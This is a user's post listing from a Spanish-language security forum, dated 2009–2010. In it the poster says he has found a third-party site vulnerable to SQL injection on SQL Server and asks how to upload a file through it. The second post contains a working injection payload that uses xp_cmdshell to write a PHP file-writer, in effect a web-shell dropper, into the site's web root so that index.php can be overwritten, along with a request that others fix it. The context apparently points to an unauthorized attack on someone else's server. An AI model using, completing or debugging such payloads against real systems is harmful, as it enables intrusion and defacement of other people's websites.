|
Mostrar Temas
|
Páginas: 1 2 [3]
|
21
|
Seguridad Informática / Nivel Web / Pregunta sobre inyeccion sqlserver.
|
en: 18 Febrero 2010, 04:07 am
|
Buenas,encontré una pagina vulnerable a sql inyection,SQLSERVER.-
quisiera saber si hay algun metodo , que con la inyeccion subir un archivo de mi pc , al pc remoto vulnerable..
La inyeccion la hago por un formulario..-
Saludos,PHAMTOM
|
|
|
22
|
Seguridad Informática / Nivel Web / pregunta v2 , sql server
|
en: 19 Noviembre 2009, 22:43 pm
|
hola
yo queria atravez de sql server , de una iyneccion en las bases de datos de una web que corre por sql server queria subirle un archivo ,pero , me pueden corregir el codigo,no lo sube y lo vi varias veces.
'';exec master..xp_cmdshell 'echo ^<? $d=fopen("index.php","w");$s=$_REQUEST["variable"];fputs($d,$s);fclose($d); ?^> > C:\AppServ\www\update.php'--
Queria subir el archivo update,con el siguiente codigo .
Gracias de antemano
el individuo usa appserver
|
|
|
|
|
|
|